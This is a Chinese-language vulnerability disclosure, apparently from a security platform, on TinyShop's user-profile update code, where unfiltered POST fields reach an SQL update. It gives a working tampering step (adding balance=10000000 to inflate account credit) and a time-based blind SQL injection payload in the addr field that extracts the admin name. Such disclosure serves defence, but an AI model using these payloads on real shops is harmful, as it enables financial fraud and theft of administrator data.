TinyShop sql注入#3（ 可无限充值）

### 简要描述： rt ### 详细说明： 我们看到 /protected/controllers/ucenter.php ``` public function info_save() { $name = Filter::sql(Req::args("name")); $id = $this->user['id']; $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update(); $this->model->table("customer")->where("user_id=$id")->update(); $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find(); $this->safebox->set('user',$obj,$this->cookie_time); $this->redirect("info"); } ``` 看到这行代码 ``` $this->model->table("customer")->where("user_id=$id")->update(); ``` 继续跟到 updata() ``` public function update() { $sql = $this->sql; if(!is_array($sql['data']) || count($sql['data'])<1) { $sql['data'] = Req::post(); } $set = ''; foreach($sql['data'] as $key => $val) { if(is_string($key) && $key != $this->primary_key && isset($this->fields[$key])) { if(is_string($key)) { $value = $val; if(is_null($val)){ $value = 'NULL'; }else{ $value = $this->formatField($this->fields[$key],$val); } if(is_scalar($value)) { if(!is_array($val) && preg_match("/`$key`/i",trim($val))){ $set .= '`'.$key.'` = '.$val.','; } else $set .= '`'.$key.'` = '.$value.','; } } } } if($set!='') { $set = 'set '.trim($set,','); $this->fields($set); $this->changeWhere(); $sql = $this->sql; $sqlStr = "update {$sql['table']} {$set} {$sql['where']}"; return $this->query($sqlStr); } } ``` post ``` public static function post() { $num = func_num_args(); $args = func_get_args(); if($num==1) { if(isset( $_POST[$args[0]])){ if(is_array( $_POST[$args[0]]))return $_POST[$args[0]]; else return trim( $_POST[$args[0]]); } return null; } else if($num>=2) { if($args[1]!==null) $_POST[$args[0]] = $args[1]; else if(isset($_POST[$args[0]])) unset($_POST[$args[0]]); } else { return $_POST; } } ``` 如果调用updata()时没有传递 data数组。他会从post传递过来的数据 赋值于set 带入sql语句 。 #1 无限充值 我们 注册用户后 来到资料修改处 抓包 ，在原有的基础上 加上balance=10000000 例如 [<img src="https://images.seebug.org/upload/201407/1805401482fab3ce4a4110afd02ce61443d24d01.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/1805401482fab3ce4a4110afd02ce61443d24d01.jpg) [<img src="https://images.seebug.org/upload/201407/1805402827f61e8fe90d64b1d081fc597d68ef70.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/1805402827f61e8fe90d64b1d081fc597d68ef70.jpg) 可以看到我瞬间土豪了。。。这个系统 还可以提现。。危害还是蛮大的。 #2 延时盲注 若 gpc关闭 或 php为高版本 我们还能进行盲注 修改 addr=' or if(ascii(substr((select name from tiny_manager),1,1))-97,null,sleep(2)) or '1 [<img src="https://images.seebug.org/upload/201407/1805480714643da52518cd1e6bb953478520bf78.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/1805480714643da52518cd1e6bb953478520bf78.jpg) [<img src="https://images.seebug.org/upload/201407/18054821c00020091bf256bb49a935c412387d79.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/18054821c00020091bf256bb49a935c412387d79.jpg) 延时成功。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/1805402827f61e8fe90d64b1d081fc597d68ef70.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/1805402827f61e8fe90d64b1d081fc597d68ef70.jpg) [<img src="https://images.seebug.org/upload/201407/18054821c00020091bf256bb49a935c412387d79.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/18054821c00020091bf256bb49a935c412387d79.jpg)